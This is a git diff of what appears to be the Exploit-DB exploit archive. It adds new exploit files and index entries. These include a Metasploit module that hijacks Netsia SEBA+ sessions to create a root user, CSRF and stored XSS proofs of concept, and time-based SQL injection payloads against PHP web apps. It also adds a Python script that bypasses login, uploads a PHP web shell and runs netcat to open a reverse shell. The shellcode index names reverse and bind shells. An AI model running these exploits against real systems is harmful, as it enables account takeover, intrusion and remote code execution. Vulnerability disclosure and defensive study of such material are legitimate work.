'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ], + [ 'URL', 'https://www.netsia.com' ] + ], + 'Author' => + [ + 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "2021-01-06", + 'DefaultOptions' => { 'SSL' => true } + )) + + register_options( + [ + Opt::RPORT(443), + OptString.new('USERNAME', [true, 'The username for your new account']), + OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)]) + ]) + end + + def peer + "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" + end + + def check + begin + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), + ) + + rescue + return Exploit::CheckCode::Unknown + end + + if res.code == 200 and res.body.include? 'sessionId' + return Exploit::CheckCode::Vulnerable + else + if res.code == 200 and res.body.include? 'SUCCESS' + print_status("Target is vulnerable! But active admin session was not found. Try again later.") + return Exploit::CheckCode::Appears + end + end + + return Exploit::CheckCode::Safe + end + + def count_user(data, find_string) + data.scan(/(?=#{find_string})/).count + end + + def run + unless Exploit::CheckCode::Vulnerable == check + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') + end + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), + ) + sescount = count_user(res.body,'"name"') + print_good("Currently #{sescount} active sessions have been detected.") + + cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/) + puts cookies + $i = 0 + + while $i <= sescount do + sessloop = cookies[$i] + sessid = "SESSION=" + sessloop.to_s + cookie = sessid.split('"]').join('').split('["').join('') + $i +=1 + json_data='{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, {"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": "edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", "/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/uni-subscription-info-location"], "perm_key": "subscriptions:view"}, {"data": ["/pal/technologyprofile/get", "/pal/technologyprofile/list", "/sepon-core/profile/get/tech", "/sepon-core/profile/list/tech"], "perm_key": "tech_profiles:view"}, {"data": ["/authentication-server/response-code"], "perm_key": "auth:response-code"}, {"data": ["/sepon-core/node/move"], "perm_key": "location:move"}, {"data": ["/pal/olt-location/add"], "perm_key": "oltlocation:edit"}, {"data": ["/sepon-core/node/delete"], "perm_key": "location:delete"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "dashboard:view"}, {"data": ["/authentication-server/role/list", "/authentication-server/role/get"], "perm_key": "role:view"}, {"data": ["/sepon-core/profile/sync/service", "/sepon-core/profile/add/sync/service", "/sepon-core/profile/delete/sync/service", "/sepon-core/profile/get/sync/service", "/sepon-core/profile/list/sync/service", "/sepon-core/profile/list/sync/service/by-profile-id", "/sepon-core/profile/list/sync/service/by-edge-id"], "perm_key": "services:sync"}, {"data": ["/sepon-core/node/get/root", "/pal/inventory/all", "/pal/inventory/pon-port-list", "/pal/inventory/uni-list", "/pal/inventory/onu-list", "/pal/inventory/olt-list", "/pal/switchinfo/list", "/pal/inventory/olt", "/pal/inventory/olt-list", "/pal/inventory/olt-location-list", "/pal/inventory/onu", "/pal/inventory/onu-list", "/pal/inventory/onu-with-serial-number", "/pal/inventory/pon-port", "/pal/inventory/pon-port-list", "/pal/inventory/uni", "/pal/inventory/uni-list", "/pal/inventory/uni"], "perm_key": "topology:view"}, {"data": ["/bbsl*/subscriber/update-service-subscription-status"], "perm_key": "services:statuschange"}, {"data": ["/sepon-core/profile/sync/speed", "/sepon-core/profile/add/sync/speed", "/sepon-core/profile/delete/sync/speed", "/sepon-core/profile/get/sync/speed", "/sepon-core/profile/list/sync/speed", "/sepon-core/profile/list/sync/speed/by-profile-id", "/sepon-core/profile/list/sync/speed/by-edge-id"], "perm_key": "speed_profiles:sync"}, {"data": ["/bbsl*/property/add", "/bbsl*/property/update", "/bbsl*/property/delete"], "perm_key": "property:edit"}, {"data": ["/sepon-core/node/add/edge", "/sepon-core/node/refresh/edge", "/sepon-core/node/get/edge", "/sepon-core/node/update"], "perm_key": "edge:edit"}, {"data": ["/sepon-core/profile/sync/tech", "/sepon-core/profile/add/sync/tech", "/sepon-core/profile/delete/sync/tech", "/sepon-core/profile/get/sync/tech", "/sepon-core/profile/list/sync/tech", "/sepon-core/profile/list/sync/tech/by-profile-id", "/sepon-core/profile/list/sync/tech/by-edge-id"], "perm_key": "tech_profiles:sync"}, {"data": ["/bbsl*/olt/delete"], "perm_key": "olt:delete"}, {"data": ["/sepon-core/node/list/edge", "/sepon-core/node/get/edge"], "perm_key": "edge:view"}, {"data": ["/sepon-core/node/add/location", "/sepon-core/node/update"], "perm_key": "location:edit"}, {"data": ["/alarm-manager/alarm/resolve"], "perm_key": "alarm:edit"}, {"data": ["/discovery/list"], "perm_key": "discovery:view"}, {"data": ["/pal/property/get"], "perm_key": "property:view"}, {"data": ["/sepon-core/node/move"], "perm_key": "edge:move"}, {"data": ["/asup/pal"], "perm_key": "asup:pal"}, {"data": ["/authentication-server/role/delete"], "perm_key": "role:delete"}, {"data": ["/pal/switchinfo/update"], "perm_key": "topology:edit"}, {"data": ["/pal/olt-location/delete"], "perm_key": "oltlocation:delete"}, {"data": ["/bbsl*/onu/disable", "/bbsl*/onu/enable"], "perm_key": "onu:statuschange"}, {"data": ["/alarm-manager/event/definition/list", "/alarm-manager/event/log/list", "/alarm-manager/event/log/search"], "perm_key": "event:view"}, {"data": ["/pal/technologyprofile/delete", "/sepon-core/profile/delete/tech"], "perm_key": "tech_profiles:delete"}, {"data": ["/pal/speedprofile/add", "/pal/speedprofile/create", "/sepon-core/profile/add/speed"], "perm_key": "speed_profiles:edit"}, {"data": ["/authentication-server/role/add", "/authentication-server/role/update"], "perm_key": "role:edit"}, {"data": ["/edge-*"], "perm_key": "gateway-test:view"}, {"data": ["/bbsl*/olt/add", "/sepon-core/node/update"], "perm_key": "olt:edit"}, {"data": ["/service-admin"], "perm_key": "service-admin:view"}, {"data": ["/asup/seba-central"], "perm_key": "asup:core"}, {"data": ["/alarm-manager/mailNotification/add", "/alarm-manager/mailNotification/update", "/alarm-manager/mailNotification/delete"], "perm_key": "alarm-mail:edit"}, {"data": ["/pal/securityprofile/get", "/pal/securityprofile/list", "/sepon-core/profile/get/security", "/sepon-core/profile/list/security"], "perm_key": "security_profiles:view"}, {"data": ["/alarm-manager/mailNotification/list", "/alarm-manager/mailNotification/active/list", "/alarm-manager/mailNotification/get"], "perm_key": "alarm-mail:view"}, {"data": ["/bbsl*/subscriber/delete", "/bbsl*/subscriber/delete-all-subscriber", "/bbsl*/subscriber/delete-list-of-service"], "perm_key": "subscriptions:delete"}, {"data": ["/bbsl*/olt/disable", "/bbsl*/olt/enable"], "perm_key": "olt:statuschange"}, {"data": ["/authentication-server/permission/list", "/authentication-server/permission/getByUser"], "perm_key": "permission:view"}, {"data": ["/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "uiconfig:edit"}, {"data": ["/response-code"], "perm_key": "gateway:response-code"}, {"data": ["/pal/speedprofile/all", "/pal/speedprofile/get", "/pal/speedprofile/list", "/sepon-core/profile/get/speed", "/sepon-core/profile/list/speed"], "perm_key": "speed_profiles:view"}, {"data": ["/pal/ont/device", "/pal/ont/uniport", "/pal/ont/whitelist", "/pal/inventory/onu-list", "/pal/ont/stats-by-olt-number", "/pal/ont/stats-by-pon-port-number", "/pal/ont/search"], "perm_key": "onu:view"}, {"data": ["/pal/securityprofile/delete", "/sepon-core/profile/delete/security"], "perm_key": "security_profiles:delete"}, {"data": ["/pal/securityprofile/add", "/pal/securityprofile/create", "/sepon-core/profile/add/security"], "perm_key": "security_profiles:edit"}, {"data": ["/temip_integration/get_alarm_list"], "perm_key": "temip:view"}, {"data": ["/authentication-server/session/list"], "perm_key": "session:view"}, {"data": ["/stats-manager/response-code"], "perm_key": "stat:response-code"}, {"data": ["/bbsl*/onu/delete-onu"], "perm_key": "onu:delete"}, {"data": ["/pal/olt-location/get", "/pal/inventory/olt-location-list", "/sepon-core/node/list/oltLocation"], "perm_key": "oltlocation:view"}, {"data": ["/pal/technologyprofile/add", "/sepon-core/profile/add/tech"], "perm_key": "tech_profiles:edit"}]}, {"locations": [], "name": "default", "permList": [{"data": ["/user/add"], "perm_key": "default"}]}, {"locations": [{"id": 1, "name": "root"}], "name": "root", "permList": []}], "status": "ACTIVE", "username": "' + datastore["USERNAME"] + '"}}' + + res = send_request_raw({ + 'method' => 'POST', + 'ctype' => 'application/json', + 'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'), + 'cookie' => cookie, + 'data' => json_data + }) + + if res.code == 200 and res.body.include? '"SUCCESS"' + print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.") + print_good("Username : #{datastore["USERNAME"]}") + print_good("Password : #{datastore["PASSWORD"]}") + break + end + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/49426.html b/exploits/php/webapps/49426.html new file mode 100644 index 000000000..f1c9d3301 --- /dev/null +++ b/exploits/php/webapps/49426.html @@ -0,0 +1,26 @@ +# Exploit Title: PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message) +# Date: 2020-12-21 +# Exploit Author: Mohamed Oosman B S +# Vendor Homepage: https://www.php-fusion.co.uk/ +# Software Link: https://www.php-fusion.co.uk/phpfusion_9_downloads.php +# Version: 9.03.90 and below +# Tested on: Windows 10 +# CVE : CVE-2020-35687 + +1. Description: +PHP-Fusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of shoutbox messages by the attacker on behalf of the logged in victim. + +2. Proof of Concept +As the requests for deleting the admin shoutbox are sent using the GET method, the CSRF attack to delete an attacker-controlled shoutbox message can be performed by having the admin visit https://TARGET.com/infusions/shoutbox_panel/shoutbox_archive.php?s_action=delete&shout_id=1 directly, +after getting to know the shout_id of the message, as it is sequential. + + + + +
+ + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/49427.txt b/exploits/php/webapps/49427.txt new file mode 100644 index 000000000..409ae81c3 --- /dev/null +++ b/exploits/php/webapps/49427.txt @@ -0,0 +1,22 @@ +# Exploit Title: WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS) +# Date: 14/01/2021 +# Exploit Author: Rahul Ramakant Singh +# Vendor Homepage: https://ghozylab.com/plugins/ +# Software Link: https://demo.ghozylab.com/plugins/easy-contact-form-plugin/ +# Version: 1.1.7 +# Tested on Windows + +Steps: + +1. Install WordPress 5.6 +2. Install and activate *Contact Form Plugin* plugin. + +3. Go to * Contact Form Plugin *plugin section and click on the add new form button. + +4. Fill all required details and click on the save button and capture the request in a proxy tool like burp suite. + +6. Append the JavaScript payload in the "Email Header" field as mentioned below + +*""* + +5. You will observe that the payload successfully got stored and reflected into the response and the malicious JavaScript payload got executed successfully and we are getting a pop-up. \ No newline at end of file diff --git a/exploits/php/webapps/49428.txt b/exploits/php/webapps/49428.txt new file mode 100644 index 000000000..c61c116de --- /dev/null +++ b/exploits/php/webapps/49428.txt @@ -0,0 +1,22 @@ +# Exploit Title: Online Hotel Reservation System 1.0 - Stored Cross-site Scripting +# Exploit Author: Mesut Cetin +# Date: 2021-01-14 +# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html +# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 + +######## Description ######## + +The room 'description' parameter is vulnerable to stored Cross-site Scripting. + + +######## Proof of Concept ######### + +Login with administrator credentials at http://localhost/admin with admin:admin and click on "Rooms" tab. + +Edit "description" parameter: + +1 + +Any user at http://localhost/marimar/index.php will get the XSS pop-up warning with their cookie values. \ No newline at end of file diff --git a/exploits/php/webapps/49429.txt b/exploits/php/webapps/49429.txt new file mode 100644 index 000000000..304fc042e --- /dev/null +++ b/exploits/php/webapps/49429.txt @@ -0,0 +1,25 @@ +# Exploit Title: Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection +# Exploit Author: Mesut Cetin +# Date: 2021-01-14 +# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html +# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 + +######## Description ######## + +Vulnerable to SQL Injection. + +// vulnerable parameter at include/room.php, line 25: + +$mydb->setQuery("SELECT * FROM ".self::$tbl_name." Where `ROOMID`= {id} LIMIT 1"); + +######## Proof of Concept ######### + +The 'id' parameter at http://localhost/marimar/admin/mod_room/index.php?view=edit&id=11 is vulnerable to time-based SQL injection. + +Payload: (select*from(select(sleep(10)))a) + +Proof of Concept: + +http://localhost/marimar/admin/mod_room/index.php?view=edit&id=(select*from(select(sleep(10)))a) \ No newline at end of file diff --git a/exploits/php/webapps/49430.txt b/exploits/php/webapps/49430.txt new file mode 100644 index 000000000..a45e757f4 --- /dev/null +++ b/exploits/php/webapps/49430.txt @@ -0,0 +1,33 @@ +# Exploit Title: Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF) +# Exploit Author: Mesut Cetin +# Date: 2021-01-14 +# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html +# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 + +######## Description ######## + +Vulnerable to Cross-site request forgery (CSRF), can lead to full account takeover of Administrator account. + +######## Proof of Concept ######### + +Send the victim the following PoC: + + + + +
+ + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/49431.txt b/exploits/php/webapps/49431.txt new file mode 100644 index 000000000..0b2fd1d4e --- /dev/null +++ b/exploits/php/webapps/49431.txt @@ -0,0 +1,34 @@ +# Exploit Title: Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection +# Exploit Author: Mesut Cetin +# Date: 2021-01-15 +# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html +# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 + +######## Description ######## + +The 'person' parameter is vulnerable to time-based SQL Injection. + + +######## Proof of Concept ####### + +Payload: (select*from(select(sleep(10)))a) + +Using Burp Suite, send the following POST request: + +POST /marimar/index.php?p=booking HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 71 +Origin: http://localhost +Connection: close +Referer: http://localhost/marimar/index.php?p=booking +Cookie: PHPSESSID=cf40af0022f401c8cfd0be17fc00a6cc +Upgrade-Insecure-Requests: 1 + +arrival=01%2F19%2F2021&departure=01%2F11%2F2021&person=(select*from(select(sleep(10)))a)&accomodation=0 \ No newline at end of file diff --git a/exploits/php/webapps/49433.txt b/exploits/php/webapps/49433.txt new file mode 100644 index 000000000..a91b69d30 --- /dev/null +++ b/exploits/php/webapps/49433.txt @@ -0,0 +1,14 @@ +# Exploit Title: Alumni Management System 1.0 - "Last Name field in Registration page" Stored XSS +# Exploit Author: Siva Rajendran +# Date: 2020-12-31 +# Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code +# Affected Version: Version 1 +# Tested on: Windows 10, Firefox Version 84.0 + +Step 1. Go to sign up page + +Step 2. In the "Last Name" field, use the following XSS payload +"> as the name and click on save. + +Step 3. This should trigger the Stored XSS payload in admin panel users tab, once the admin login into the application to verify the registered users email address. The attacker steals the admin session cookie \ No newline at end of file diff --git a/exploits/php/webapps/49434.py b/exploits/php/webapps/49434.py new file mode 100755 index 000000000..85ecd8f45 --- /dev/null +++ b/exploits/php/webapps/49434.py @@ -0,0 +1,93 @@ +# Exploit Title: E-Learning System 1.0 - Authentication Bypass & RCE +# Exploit Author: Himanshu Shukla & Saurav Shukla +# Date: 2021-01-15 +# Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip +# Version: 1.0 +# Tested On: Kali Linux + XAMPP 7.4.4 +# Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution + +#Step 1: run the exploit in python with this command: python3 exploit.py +#Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/ +#Step 3: Input your LHOST where you want the reverse shell: Example: 10.9.192.23 +#Step 4: Input your LPORT that is the port where the reverse shell will spawn: Example: 4444 +#Step 5: Start a Netcat Listener on the port specified in Step 4 using this command: nc -lnvp 4444 +#Step 6: Hit enter on the if your Netcat Listener is ready, and you will get a reverse shell as soon as you hit enter. + +import requests + +print('########################################################') +print('## E-LEARNING SYSTEM 1.0 ##') +print('## AUTHENTICATION BYPASS & REMOTE CODE EXECUTION ##') +print('########################################################') + +print('Author - Himanshu Shukla & Saurav Shukla') + +GREEN = '\033[32m' # Green Text +RED = '\033[31m' # Red Text +RESET = '\033[m' # reset to the defaults +#Create a new session +s = requests.Session() + +#Set Cookie +cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} + +LINK=input("Enter URL of The Vulnarable Application : ") + +#Authentication Bypass +print("[*]Attempting Authentication Bypass...") +values = {"user_email":"'or 1 or'", "user_pass":"lol","btnLogin":""} +r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) + +r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) + +#Check if Authentication was bypassed or not. +logged_in = True if("You login as Administrator." in r.text) else False +l=logged_in +if l: + print(GREEN+"[+]Authentication Bypass Successful!", RESET) +else: + print(RED+"[-]Failed To Authenticate!", RESET) + + +#Creating a PHP Web Shell + +phpshell = { + 'file': + ( + 'shell.php', + '', + 'application/x-php', + {'Content-Disposition': 'form-data'} + ) + } + +# Defining value for form data +data = {'LessonChapter':'test', 'LessonTitle':'test','Category':'Docs','save':''} + + + +#Uploading Reverse Shell +print("[*]Uploading PHP Shell For RCE...") +upload = s.post(LINK+'/admin/modules/lesson/controller.php?action=add', cookies=cookies, files=phpshell, data=data, verify=False) + +shell_upload = True if("window.location='index.php'" in upload.text) else False +u=shell_upload +if u: + print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) +else: + print(RED+"[-]Failed To Upload The PHP Shell!", RESET) + +print("[*]Please Input Reverse Shell Details") +LHOST=input("[*]LHOST : ") +LPORT=input("[*]LPORT : ") + +print('[*]Start Your Netcat Listener With This Command : nc -lvnp '+LPORT) +input('[*]Hit Enter if your netcat shell is ready. ') +print('[+]Deploying The Web Shell...') + + +#Executing The Webshell +e=s.get('http://192.168.1.5/caiwl/admin/modules/lesson/files/shell.php?cmd=nc 192.168.1.2 9999 -e /bin/bash', cookies=cookies) + +exit() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 78871fb32..6edff21bf 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -25884,6 +25884,9 @@ id,file,description,date,author,type,platform,port 12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,webapps,php, 12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,webapps,php, 12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,webapps,php, +49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",2021-01-15,"Siva Rajendran",webapps,php, +49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass & RCE POC",2021-01-15,"Himanshu Shukla",webapps,php, +49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit)",2021-01-15,AkkuS,webapps,multiple, 40091,exploits/php/webapps/40091.rb,"Tiki Wiki 15.1 - File Upload (Metasploit)",2016-07-11,"Mehmet Ince",webapps,php,80 30170,exploits/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",webapps,php, 18593,exploits/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,webapps,php, @@ -43625,3 +43628,10 @@ id,file,description,date,author,type,platform,port 49423,exploits/php/webapps/49423.txt,"Online Shopping Cart System 1.0 - 'id' SQL Injection",2021-01-14,"Aydın Baran Ertemir",webapps,php, 49424,exploits/php/webapps/49424.py,"Laravel 8.4.2 debug mode - Remote code execution",2021-01-14,"SunCSR Team",webapps,php, 49425,exploits/hardware/webapps/49425.py,"Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC)",2021-01-14,"Shizhi He",webapps,hardware, +49426,exploits/php/webapps/49426.html,"PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message)",2021-01-15,"Mohamed Oosman",webapps,php, +49427,exploits/php/webapps/49427.txt,"WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS)",2021-01-15,"Rahul Ramakant Singh",webapps,php, +49428,exploits/php/webapps/49428.txt,"Online Hotel Reservation System 1.0 - 'description' Stored Cross-site Scripting",2021-01-15,"Mesut Cetin",webapps,php, +49429,exploits/php/webapps/49429.txt,"Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection",2021-01-15,"Mesut Cetin",webapps,php, +49430,exploits/php/webapps/49430.txt,"Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF)",2021-01-15,"Mesut Cetin",webapps,php, +49431,exploits/php/webapps/49431.txt,"Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection",2021-01-15,"Mesut Cetin",webapps,php, +49432,exploits/multiple/webapps/49432.sh,"EyesOfNetwork 5.3 - File Upload Remote Code Execution",2021-01-15,"Audencia Business SCHOOL Red Team",webapps,multiple, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 2e25c10fe..dd7c1ce9c 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -10,7 +10,7 @@ id,file,description,date,author,type,platform 13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind (31337/TCP) Shell Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86 13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind (Random TCP Port) Shell Shellcode (143 bytes)",2004-09-26,MayheM,shellcode,bsd_x86 13250,shellcodes/bsd_x86/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 -13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve(/bin/sh) Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 +13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve(/bin/sh) + Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve(/bin/sh) + Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 @@ -18,15 +18,15 @@ id,file,description,date,author,type,platform 13257,shellcodes/bsdi_x86/13257.c,"BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86 13258,shellcodes/bsdi_x86/13258.c,"BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86 13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86 -13261,shellcodes/freebsd/13261.c,"FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd -13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86 +13261,shellcodes/freebsd/13261.c,"FreeBSD x86/x64 - execve(/bin/sh) + Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd 